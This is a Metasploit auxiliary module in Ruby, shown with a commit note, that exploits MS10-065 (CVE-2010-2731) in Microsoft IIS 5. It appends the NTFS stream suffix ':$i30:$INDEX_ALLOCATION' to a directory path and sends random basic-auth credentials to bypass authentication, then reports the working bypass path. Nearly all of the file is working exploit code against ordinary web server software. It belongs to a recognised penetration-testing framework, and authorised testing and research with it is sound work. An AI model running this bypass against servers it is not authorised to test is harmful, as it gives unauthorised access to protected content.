sinn3r
230db6451b
The HttpClient mixin has a peer() method, therefore these modules should not have to make their own. Also new module writers won't repeat the same old code again.
94 lines
2.4 KiB
Ruby
94 lines
2.4 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
|
|
'Description' => %q{
|
|
This module bypasses basic authentication for Internet Information Services (IIS).
|
|
By appending the NTFS stream name to the directory name in a request, it is
|
|
possible to bypass authentication.
|
|
},
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-2731' ],
|
|
[ 'OSVDB', '66160' ],
|
|
[ 'MSB', 'MS10-065' ],
|
|
[ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
|
|
],
|
|
'Author' =>
|
|
[
|
|
'Soroush Dalili',
|
|
'sinn3r'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'DisclosureDate' => "Jul 02 2010"
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
|
|
], self.class)
|
|
end
|
|
|
|
|
|
def has_auth
|
|
uri = normalize_uri(target_uri.path)
|
|
uri << '/' if uri[-1, 1] != '/'
|
|
|
|
res = send_request_cgi({
|
|
'uri' => uri,
|
|
'method' => 'GET'
|
|
})
|
|
vprint_status(res.body) if res
|
|
|
|
return (res and res.code == 401)
|
|
end
|
|
|
|
def try_auth
|
|
uri = normalize_uri(target_uri.path)
|
|
uri << '/' if uri[-1, 1] != '/'
|
|
uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
|
|
|
|
dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'
|
|
|
|
user = Rex::Text.rand_text_alpha(rand(10) + 5)
|
|
pass = Rex::Text.rand_text_alpha(rand(10) + 5)
|
|
|
|
|
|
vprint_status("Requesting: #{dir}")
|
|
res = send_request_cgi({
|
|
'uri' => dir,
|
|
'method' => 'GET',
|
|
'authorization' => basic_auth(user,pass)
|
|
})
|
|
vprint_status(res.body) if res
|
|
|
|
return (res and res.code != 401 and res.code != 404) ? dir : ''
|
|
end
|
|
|
|
def run
|
|
if not has_auth
|
|
print_error("#{peer} - No basic authentication enabled")
|
|
return
|
|
end
|
|
|
|
bypass_string = try_auth
|
|
|
|
if bypass_string.empty?
|
|
print_error("#{peer} - The bypass attempt did not work")
|
|
else
|
|
print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
|
|
end
|
|
end
|
|
|
|
end
|